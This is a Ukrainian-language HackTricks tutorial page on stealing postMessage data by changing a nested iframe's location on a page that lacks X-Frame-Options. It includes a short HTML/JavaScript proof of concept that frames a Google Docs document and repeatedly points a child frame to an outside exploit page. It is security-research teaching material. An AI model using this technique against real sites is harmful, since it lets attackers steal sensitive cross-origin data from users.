Ukranian - Ht
HackTricks Training Twitter Linkedin Sponsor

Steal postmessage modifying iframe location

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Зміна місць розташування дочірніх iframe

Згідно з цим описом, якщо ви можете вбудувати веб-сторінку без заголовка X-Frame, яка містить інший iframe, ви можете змінити місце розташування цього дочірнього iframe.

Наприклад, якщо abc.com має efg.com як iframe і у abc.com відсутній заголовок X-Frame, я можу змінити efg.com на evil.com через, frames.location.

Це особливо корисно в postMessages, оскільки якщо сторінка надсилає чутливі дані за допомогою шаблону як windowRef.postmessage("","*"), можливо змінити місце розташування пов'язаного iframe (дочірнього або батьківського) на контрольоване зловмисником місце та викрасти ці дані.

<html>
<iframe src="https://docs.google.com/document/ID" />
<script>
//pseudo code
setTimeout(function(){ exp(); }, 6000);

function exp(){
//needs to modify this every 0.1s as it's not clear when the iframe of the iframe affected is created
setInterval(function(){
window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
}, 100);
}
</script>
</html>
Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!
PreviousBypassing SOP with Iframes - 2NextProxy / WAF Protections Bypass

Last updated